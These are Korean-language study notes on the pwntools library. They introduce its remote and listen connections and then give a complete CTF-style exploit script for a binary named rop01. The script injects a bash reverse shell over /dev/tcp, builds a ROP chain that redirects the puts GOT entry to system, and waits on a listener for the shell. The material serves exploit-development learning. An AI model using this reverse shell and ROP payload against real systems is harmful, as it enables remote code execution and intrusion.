pwntool쓰기

pwntools

what?

CTP framework and explit development library.

파이썬으로 쓰여져 있음

pwn : CTF을 위한 최적화 Toolbox

pwnlib : 일반적 python library

Getting Started

1. Making connections

(1)remote

원격 host에 TCP or UDP connection 생성(supports both IPv4 and IPv6)

class : remote(host,port,fam='any',typ='tcp',ssl=False[bool],sock=None,*args,**kwargs)

>>> r = remote('google.com', 443, ssl=True)

>>> r.send('GET /\r\n\r\n')

>>> r.recvn(4)

'HTTP'

(2)listen

데이터를 받을 수 있는 TCP or UDP -socket 생성

-------------------------------------------------------python code---------------------------------------------------------

#!/usr/bin/env python

# encoding: utf-8

from pwn import *

#geting started---------------Local or remote or ssh / elf info--------------------

LOCAL = "remote" not in sys.argv  #sys.argv[command line] don't have "remote"word =1 

elf = ELF("./rop01") #program ELF 

context.update(binary=elf) #target program info update

if LOCAL: #=LOCAL

    libc = elf.libc

    r = process(elf.path)

else:

    libc = ELF("libc.so") #remote / ssh or remote setting

    r = remote("localhost", 1337)

l = listen(1337)

#debuging--------------------------------------------------------------------------

def debug(cmd=''): #def function_name(parameter):

    if "gdb" in sys.argv:  #gdb

        pie_base, glibc_base = r.libs()[elf.path], r.libs()[libc.path]

        gdb.attach(r.proc.pid, cmd + """\nc""")

    elif "strace" in sys.argv: #strace

        run_in_new_terminal("strace -ff -p %d" % r.proc.pid)

    time.sleep(0.5)

#----------------------------------------------------------------------------------

debug('b *0x8048701')

r.sendlineafter("What is your name?\n> ", "bash -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'\x00")

r.sendlineafter("What is your quest?\n> ", "B" * 100)

payload = flat(

    "C" * 112,

    # NEED CONTROL OF EBP

    0x0804871a, # popad  ; cld  ; ret

    0, # EDI

    0, # ESI

    elf.got['puts'] - 0xc, # EBP

    "TEST",

    0, # EBX

    libc.symbols['system'] - libc.symbols['puts'], # EDX

    0, # ECX

    0, # EAX

    0x0804858c, # mov eax, dword [ebp+0x0C] ; add eax, edx ; pop ebp ; ret  ;  (1 found)

    "JUNK", # pop ebp

    0x080484f1, # call eax

elf.symbols['answer1']

)

r.sendlineafter("What is the air-speed velocity of an unladen swallow?\n> ", payload)

log.info('Waiting for a shell...')

l.wait_for_connection()

l.interactive()

r.close()